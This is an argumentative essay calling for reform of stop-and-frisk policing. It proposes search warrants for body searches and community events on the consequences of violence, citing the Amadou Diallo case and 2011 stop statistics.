You are walking down an alley way, trying to take the quickest route home to make it to dinner on time. Suddenly, a cop stops you, telling you to drop your belongings and put your hands in the air. You are shocked, scared, and confused, while being stripped of your dignity. Stop and Frisk arose around the mid 90’s. It was a means of stopping crime before it occurs. However, the reason behind the sudden stops was categorized as racially discriminatory, and offensive. In March 1999, problems with stop and frisk began to sprout, due to it causing the death of an unarmed African Immigrant, Amadou Bailo Diallo. This heart breaking tragedy opened the eyes of many, and bit by bit people began to perceive the racial profiling that transpired when it came to stop and frisk. If we want the discrimination to stop, however still allowing police officers to fulfill their duty then there are some flaws that must be adjusted. The mayor of the city should lay down restrictions on officer’s freedom and stabilize their training; to ensure peoples boundaries. Not only should the mayor take part in changing the system of stop and frisk, but our communities as well. In our communities, and neighborhoods with high crime rates, more charity events should be held explaining the consequences of violence, giving people a feel of what can happen if they begin or continue to explore criminal activities. If these changes towards stop and frisk are not constructed, then New York, the tri-state area, and the nation, will continue to fight back without hesitation. Stop and Frisk needs to have restrictions, the officers executing it, have an excessive amount of rights. The idea of an officer randomly pulling an individual to the side and searching them, stripping them of innocence, simply because they â€Å"fit the description† is absurd! Especially since, this is after all, the United States of America, a nation of justice and freedom. Having restrictions on stop and frisk would limit police officers power of freely stopping people based on bias suspicions. I suggest ‘restrictions’ meaning, a warrant. Just as one needs a warrant to search your house, or to arrest you, there should be one that gives officers a clearance to search your body. This of course, would mean that an officer cannot simply search you on sight; they would need to report their discoveries to headquarters and wait for an electronic authorization to conduct their search, while still keeping their eyes on you, maintaining low  profile. In charge to make sure that this change is permitted, as well as funded would be the mayor, since titled â€Å"head of the city†. However, the person administering the warrant would be police deputy (whom possesses great experience with criminals, knowing how a criminal looks or moves should be their second nature), for they have the power to stipulate lower ranked police men, and make sure they are fulfilling their duties correctly. The theory of restrictions on stop and frisk has no guarantee of working, because it has never been done in the past. However, people requested previously that police officers have a different approach on training and â€Å"disciplinary policies†. No one knows how legitimate an officers training is, but it is safe to say, evidently their training on stop and frisking people is developing the mind of a discriminative police officer. Study shows that recently in 2011 a total of 685,724 people were stopped and out of that number 605,328 people were innocent. Amongst that 350,743 were black, 223,740 were Latino, 61,805 were white, and 341,581 were aged 14-24. With such high numbers you can see that there is no restriction, neither is there any order. Nonetheless, if officers were trained with restrictions, having to obtain a warrant, then the number of innocents being stop and frisked would decrease, and ensure people’s boundaries, while still carrying out their responsibilities. Instead of trying to force people into submission and risking the chances of aimlessly searching a blameless person, charity events should be conducted. The same strength, power and wisdom a cop has to heedlessly invade the privacy of another, they can join forces with the community, together hosting events that carefully exhibits the consequences of violence. Stop and frisk could go as far back as gun violence, gang banging, possession of illegal drugs, etc. No one could personally change someone’s character, but if told the ramifications it would implant options; something that people fail to realize they have. These events could lead to activities, buildings, and shows that could primarily keep people off the streets. Of course these types of things require money, which can be raised by the people of our communities. According to Ignite Tampa, it’s good to have a sense of community, meaning â€Å"a feeling members have of belonging, a feeling that members matter to one another and the group, and a shared faith that members needs will be met through their commitment to be together†. If these violent communities had  more productive things occurring that made them feel that they belong then violent activities would decrease far greater than using an aggressive method like stop and frisk. Community engagement can increase employment, economic growth, and decrease criminal movement, â€Å"pollution† and â€Å"ethnic disparities†. Getting involved in the community doesn’t only help others, but as well as you. Caring can go a long way, it can go as far as discontinuing stop and frisk. It is understandable that people don’t want the stop and frisk policy to change or cease because they believe it has slowed down many crimes in advance. However, keeping stop and frisk as is, without rectifying it would cause communities to feel uncomfortable and violated, simply because it is an erratic search officers are conducting. People may think that my solutions are expensive, or unrealistic. The average income of a community can range from $60,000-$200,000, and a small charity event cost from as low as $1,000 to $10,000, so as far as expenses, a community has more than enough money to fund for charity events. As far as being realistic anything is possible, it all comes down to how far one is willing to go to fight for their rights and what they may believe in. My solutions will work with the dedication of many. If we want to fight against stop and frisk and regulate it we should together think of reasonable solutions of how that could be done. Two solutions that I presented were for the mayor to create restrictions that ensures one’s boundaries, and for the community to come together to host events stating the consequences of violence. Spread the word now and tell others of these solutions. Come together and volunteer to help out your community. Stop, stop and frisk and reduce criminal activities. What goes on in your community will affect you, take your stance.